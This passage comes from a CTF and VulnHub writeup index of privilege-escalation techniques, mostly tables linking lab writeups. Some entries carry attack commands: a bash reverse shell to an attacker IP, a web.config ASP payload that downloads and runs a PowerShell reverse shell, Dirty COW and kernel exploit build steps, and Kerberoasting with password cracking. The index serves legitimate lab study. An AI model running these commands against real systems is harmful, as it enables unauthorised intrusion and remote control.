privesc_bash_reverseshell [⇡](#privesc) bash reverse shell command ```shell bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells --- <a name="privesc_bof"></a> #### privesc_bof [⇡](#privesc) craft exploit for the buffer overflow vulnerability to gain elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | --- <a name="privesc_chkrootkit"></a> #### privesc_chkrootkit [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | --- <a name="privesc_credsreuse"></a> #### privesc_credsreuse [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | --- <a name="privesc_cron"></a> #### privesc_cron [⇡](#privesc) leverage cronjobs to modify and execute `root` owned files ```shell crontab -l cat /etc/crontab ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [CronOS](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf) | [htb#11](https://www.hackthebox.eu/home/machines/profile/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 2. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 3. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_cron_rootjobs"></a> #### privesc_cron_rootjobs [⇡](#privesc) it would be useful to find `root` owned cronjob processes ```shell pspy # find root owned processes, cronjobs find / -type f -mmin -60 -ls 2>/dev/null # look for recently modified files since a user may not be able to see cron jobs by root ./CheckcronJob.sh # find background processes ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://www.hackthebox.eu/home/machines/profile/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | [+] https://www.reddit.com/r/oscp/comments/gb4k83/htb_bashed_and_my_learnings_oscp_journey/ --- <a name="privesc_ctf_usertxt_timestamp"></a> #### privesc_ctf_usertxt_timestamp [⇡](#privesc) a neat trick for ctf boxes is to use `user.txt` file time as a reference to search for recently modified files ```shell ls -lh /home/<username>/user.txt ``` [+] https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959/19 --- <a name="privesc_dirtycow"></a> #### privesc_dirtycow [⇡](#privesc) race condition that allows breakage of private read-only memory mappings ```shell wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c gcc -pthread -o dc dc.c -lcrypt ./dc ``` [+] https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs --- <a name="privesc_docker_group"></a> #### privesc_docker_group [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | --- <a name="privesc_env_relative_path"></a> #### privesc_env_relative_path [⇡](#privesc) certain files when referenced without their complete path, can be misused to gain elevated privileges. this can be done by modifying the environment path to find the referenced file within a directory under attacker's control and placing a malicious binary within that directory with the same name as the referenced file | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | [+] https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/ --- <a name="privesc_freebsd"></a> #### privesc_freebsd [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | --- <a name="privesc_iis_webconfig"></a> #### privesc_iis_webconfig [⇡](#privesc) on iis servers, the web.config file stores configuration data for web applications (similar to .htaccess on apacher server). it can contain asp code which will be executed by the web server. use the powershell reverse shell from [nishang framework](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to get a call back from uploaded web.config file ```shell sample web.config: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <%@ Language=VBScript %> <% call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('<attackerip>/Invoke-PowerShellTcp.ps1')") %> ``` [+] https://0xdf.gitlab.io/2018/10/27/htb-bounty.html --- <a name="privesc_kerberos_kerberosting"></a> #### privesc_kerberos_kerberosting [⇡](#privesc) allows us to extract administrator tickets and crack those to obtain administrator password ```shell # add entry for target system within /etc/hosts GetUserSPNs.py -request active.htb/SVC_TGS -outputfile ./adminticket john --format=krb5tgs --wordlist /usr/share/wordlists/rockyou.txt ./adminticket # does not work on john v1.8.0.6-jumbo-1-bleeding psexec.py administrator@active.htb ``` [+] https://0xrick.github.io/hack-the-box/active/ [+] https://room362.com/post/2016/kerberoast-pt1/ [+] https://room362.com/post/2016/kerberoast-pt2/ [+] https://room362.com/post/2016/kerberoast-pt3/ --- <a name="privesc_kernel_ipappend"></a> #### privesc_kernel_ipappend [⇡](#privesc) Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5/4.8 / Fedora Core 4/5/6 x86) ```shell gcc -m32 -o exploit 9542.c -Wl,--hash-style=both ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | [+] https://www.exploit-db.com/exploits/9542 [+] https://nvd.nist.gov/vuln/detail/CVE-2009-2698 --- <a name="privesc_kernel_overlayfs"></a> #### privesc_kernel_overlayfs [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_lxc_bash"></a> #### privesc_lxc_bash [⇡](#privesc) ```shell check output of id command if user is member of lxd group, follow https://reboare.github.io/lxd/lxd-escape.html ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | --- <a name="privesc_modssl"></a> #### privesc_modssl [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100" /> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | --- <a name="privesc_mysql_creds"></a> #### privesc_mysql_creds [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 2. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 3. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | --- <a name="privesc_mysql_root"></a> #### privesc_mysql_root [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 2. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_mysql_udf"></a> #### privesc_mysql_udf [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 2. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_nfs_norootsquash"></a> #### privesc_nfs_norootsquash [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="privesc_nmap"></a> #### privesc_nmap [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 2. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | --- <a name="privesc_passwd_writable"></a> #### privesc_passwd_writable [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | --- <a name="privesc_psexec_login"></a> #### privesc_psexec_login [⇡](#privesc) If credentials for an administrative user are available, we can use `psexec.py` to connect and gain elevated access to the target system. ```shell psexec <username>@<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="privesc_setuid"></a> #### privesc_setuid [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 2. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 3. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 5. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 6. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_shell_escape"></a> #### privesc_shell_escape [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_ssh_authorizedkeys"></a> #### privesc_ssh_authorizedkeys 